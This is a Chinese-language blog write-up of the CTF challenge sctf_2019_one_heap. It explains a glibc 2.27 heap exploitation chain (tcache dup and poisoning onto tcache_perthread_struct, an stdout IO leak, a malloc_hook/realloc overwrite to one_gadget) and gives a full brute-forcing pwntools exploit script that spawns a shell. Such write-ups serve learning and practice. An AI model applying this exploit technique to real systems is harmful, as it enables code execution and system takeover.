sctf_2019_one_heap

写在前面:

在之前做这道题的时候SWPUCTF_2019_p1KkHeap,就受到了tcache dup+tcache poisoning来爆破申请tcache_perthread_struct结构体的启发,结果在做这道题的时候就遇见了这种手法。由于还需要打io_leak再次爆破半个字节,因此这种手法成功的概率只有1/256。

保护策略:

漏洞所在&&程序分析:

漏洞所在:

存在UAF漏洞如下:

程序分析:

这道题只有add函数和delete函数,并且限制了两个函数的执行次数。delete函数只能执行4次,add函数只能执行15次。

然后delete函数的话只能释放最近一次执行add函数申请出来内存空间的地址。add函数最多只能申请0x7f大小的堆块,也不存在溢出。

利用思路:

tcache_struct_attack:

存在UAF漏洞,我们打一个tcache dup。由于tcache_perthread_struct结构体是和分配出来的堆块存在固定偏移,因此tcache poisoning去修改末尾两个字节即可,改为x000(x我们需要爆破一下,概率为1/16,调试的时候关闭ASLR就不用爆破了)。

当爆破成功时,我们就可以将tcache_perthread_struct申请出来了,然后我们就可以控制任意tcache链表中的头指针,以及链表中堆块的数量。

接着我们修改0x250这条链上的count为7,我们将刚刚申请出来的tcache_perthread_struct给释放掉,该堆块的大小为0x250,由于0x250这条链上的count为7了,所以再次释放就进入了unsorted bin中。(如下图)

由于下次从这个0x250堆块中分割一定的内存,就可以让unsorted bin中的fd和bk指针落在我们想要的tcache链上。接着再次申请0x10的内存,这样就可以去编辑刚刚的fd和bk指针了,这里我们去编辑bk指针,将其修改为stdout地址(需要爆破),然后再次释放掉这个0x10的堆块,让其进入fastbin中,等之后使用。

编辑前后,如下图

下图是我做出来之后,懒的再关闭ASLR了,所以直接set改了一下内存值。

然后我们申请一个0x60大小的堆块,就可以申请出来stdout结构体了,打io leak泄露libc地址。

由于之前我们释放了那个0x10的堆块,此时我们再申请回来(它一直在fastbin中),这次写入malloc_hook-8的地址(因为one_gadget都不通,只能用realloc函数来调整栈帧了)

如下图,此时的realloc_hook已经出来了,只要我们申请0x50的堆块,就可以去编辑它了。

最终调整栈帧打one_gadget即可获取shell。

完事了关闭ASLR爆破打远程就行了。说实话这个概率是1/256,但我的脸比较黑,大多时候要爆个三百次左右才出来。

EXP:

exp里的tcache_struct_attack函数是我自定义出来的,因为每次想伪造tcache_struct里的数据,都要去数一下对应的size中的值,感觉有一点麻烦,就顺便写了个函数去指定size写下对应count的值以及地址。

tools源码

from tools import *
#context.log_level='debug'
d_d=0x98C
d_a=0x99F
def add(size,content):
    p.sendlineafter('Your choice:',str(1))
    p.sendlineafter("Input the size:",str(size))
    p.sendlineafter('Input the content:',content)


def delete():
    p.sendlineafter('Your choice:',str(2))

def pwn():
    add(0x7f,'a')
    delete()
    delete()
    #debug(p,'pie',d_d,d_a,0xDB5,0xD2B)
    add(0x7f,p16(0xc010))
    add(0x7f,'')
    payload=tcache_struct_attack({0x250:7,0x130:1})
    add(0x7f,payload)
    delete()
    add(0x50,'abcd')
    add(0x10,p64(0)+p16(0x6760))
    
    delete()
    add(0x60,p64(0xfbad1887)+p64(0)*3+b'\x00')
    leak_libc=recv_libc()
    libc_base=leak_libc-0x3ed8b0
    log_addr('libc_base')
    if libc_base&0xfff==0:
        print("success!!!")
        pause()
    malloc_hook=libc_base+libc.symbols['__malloc_hook']
    realloc=libc_base+libc.symbols['realloc']
    one_gadget=search_og(1)

    add(0x10,p64(malloc_hook-8))
    add(0x50,p64(one_gadget+libc_base)+p64(realloc+8))
    
    add(0x10,'')
    p.interactive()

i=0
while 1:
    log('Number of blasting',str(i))
    p,e,libc=load("a","")
    libc=ELF('/home/hacker/Desktop/buu64-libc-2.27.so')
    try:
        pwn()
    except:
        p.close()
    i=i+1

这里是爆了355次才出来....

posted @ 2022-09-04 23:28  ZikH26  阅读(144)  评论(0编辑  收藏  举报